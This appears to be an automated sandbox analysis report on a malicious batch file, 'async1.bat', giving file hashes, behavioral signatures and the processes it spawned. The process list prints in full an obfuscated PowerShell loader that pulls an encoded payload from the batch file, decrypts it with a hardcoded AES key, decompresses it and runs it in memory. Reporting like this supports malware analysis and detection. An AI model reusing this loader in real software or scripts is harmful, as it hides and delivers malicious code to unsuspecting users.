Analysis
-
max time kernel
42s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
10/01/2023, 08:50
Static task
static1
Behavioral task
behavioral1
Sample
async1.bat
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
async1.bat
Resource
win10v2004-20220901-en
General
-
Target
async1.bat
-
Size
53KB
-
MD5
48c5d502eb750b327615dec7362dabf9
-
SHA1
93d7f7ce15d1ffc3b584056eadef6f72deede6bb
-
SHA256
80c1568ef979e0d9881fa33ee69c3f8c15caa924acd4df9e4c951a7047577caa
-
SHA512
15abd3360d6e9fa55892199a94f57d3d4a32798a15a5bb406d42bdb458cd679f4a27f8e310b4579d4b9c38d4384fd1e4015508ea68970c678facdf4a9cedc411
-
SSDEEP
768:OonA1XlKQLUXpAyDnezCBrVvb5XEzbtMUVD96UKi2MLo2TmOtSBNodnU6gQBM:KXwQLUX/SC/v1UzbtTl1E238nyUBQBM
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1536 async1.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 536 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1536 async1.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1536 async1.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 536 wrote to memory of 1536 536 cmd.exe 28 PID 536 wrote to memory of 1536 536 cmd.exe 28 PID 536 wrote to memory of 1536 536 cmd.exe 28
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\async1.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Admin\AppData\Local\Temp\async1.bat.exe"async1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YJBbV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\async1.bat').Split([Environment]::NewLine);foreach ($NkUDf in $YJBbV) { if ($NkUDf.StartsWith(':: ')) { $JcNlJ = $NkUDf.Substring(3); break; }; };$JzMFw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($JcNlJ);$SCaAH = New-Object System.Security.Cryptography.AesManaged;$SCaAH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$SCaAH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$SCaAH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poUZgytmmU5AjB6HrelvPa2m9IAI5avoBXgweEVtJHM=');$SCaAH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZJ8AebITHPrLQOysxJlupA==');$bcmpg = $SCaAH.CreateDecryptor();$JzMFw = $bcmpg.TransformFinalBlock($JzMFw, 0, $JzMFw.Length);$bcmpg.Dispose();$SCaAH.Dispose();$pvpsr = New-Object System.IO.MemoryStream(, $JzMFw);$fgJRB = New-Object System.IO.MemoryStream;$SFExd = New-Object System.IO.Compression.GZipStream($pvpsr, [IO.Compression.CompressionMode]::Decompress);$SFExd.CopyTo($fgJRB);$SFExd.Dispose();$pvpsr.Dispose();$fgJRB.Dispose();$JzMFw = $fgJRB.ToArray();$CxiQm = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JzMFw);$Psztc = $CxiQm.EntryPoint;$Psztc.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d